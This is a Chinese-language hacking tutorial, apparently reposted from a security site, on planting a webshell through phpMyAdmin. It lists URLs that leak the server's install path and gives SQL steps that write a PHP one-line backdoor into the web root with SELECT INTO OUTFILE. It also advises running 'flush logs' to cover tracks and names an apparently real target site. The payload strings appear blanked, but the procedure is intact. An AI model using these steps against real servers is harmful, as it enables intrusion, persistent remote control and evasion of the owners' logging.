phpmyadmin 后台拿webshell

1:phpmyadmin 后台拿webshell
phpmyadmin爆路径方法 weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php
http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径
D:\usr\www\html\phpMyAdmin\
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('');
select cmd from a into outfile 'D:/usr/www/html/phpMyAdmin/d.php';
Drop TABLE IF EXISTS a;

 

 

 

Fatal error: Call to a member function getImgPath() on a non-object in D:\www\phpMyAdmin\themes\darkblue_orange\layout.inc.php on line 67

这里随便选择一个 数据库 我们这用MYSQL 然后点SQL 执行SQL语句
Create TABLE a (cmd text NOT NULL); 这句是 在MYSQL这个数据库中建一个 a 的表段
看到了吧   a 已经有了 然后再执行
Insert INTO a (cmd) VALUES('');
意思你应该懂了吧   就是 把PHP一句话 写到a这个表里
继续
select cmd from a into outfile 'D:/www/d.php';
这一句 就是说 把刚刚的那个 a 的表 输出到 网站的目录下的哪个文件里 我们这里把 刚暴出来的
路径写上   这里一定要注意 Windows里面的 / 这个斜刚 一定要注意 要把\ 这个斜刚换成/这个斜刚 不然PHP 不支持 就不会成功了

http://www.crystalnet.com.cn/d.php   ok了 连接我们的 PHP一句话

首先：
create database joyuan; /* 建立数据库joyuan */
use joyuan; /* 连接joyuan数据库 */
create table shell(code text); /* 建立表shell字段code文本型数据text */

然后：
insert into shell(code) /* 插入数据到shell表中的code字段 */
values ('shell代码'); /* 值为shell代码 我用PHP一句话，看后面*/
select * into outfile '/home/www/htdocs/server.php' from shell;
/* 将shell表中的内容输出保存为文件(输出到web目录下，要不就无法访问shell了，可以直接输出到phpmyadmin目录下，不知道就phpinfo) */
flush logs /* 删除日志 */

删掉刚建的joyuan数据库，直接删除或执行SQL命令：drop database joyuan;

利用PHP一句话客户端（http://linux.chaom.net/Shell.Htm）写自己的shell

PHP一句话的服务端地址就是：http://xxx/phpmyadmin/server.php

搞定，嘿嘿。

PHP一句话服务端代码：

 

========================================

Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('');
select cmd from a into outfile 'D:/phpMyAdmin/libraries/d.php';
Drop TABLE IF EXISTS a;

========================================

①建立数据库

create database hakz                        /*建立数据库hakz*/

use hakz                                          /*连接hakz数据库*/

create table shell(code text)           /*建立表shell，字段code为文本型数据*/       ②插入导出shell

insert into shell(code) values ('后门代码');       /*插入shell代码*/

select * into outfile '/home/www/website/…路径/shell.php' from shell;

                                                  /*导出shell到web路径下*/

flush logs                                       /*删除日志 这一点很重要哦*/        ③删除临时数据库

drop database hakz                   /*或者直接在phpmyadmin中进行可视化操作*/
最后附上几种PHP一句话服务端代码：

                   /*容错代码*/

                  /*assert 函数和 eval一样*/

 

_______________________________________
本篇文章来源于Vip_威寶] | 关注网络信息安全 [http://www.weibao.tk/]
详细地址为:http://www.weibao.tk/article.asp?id=223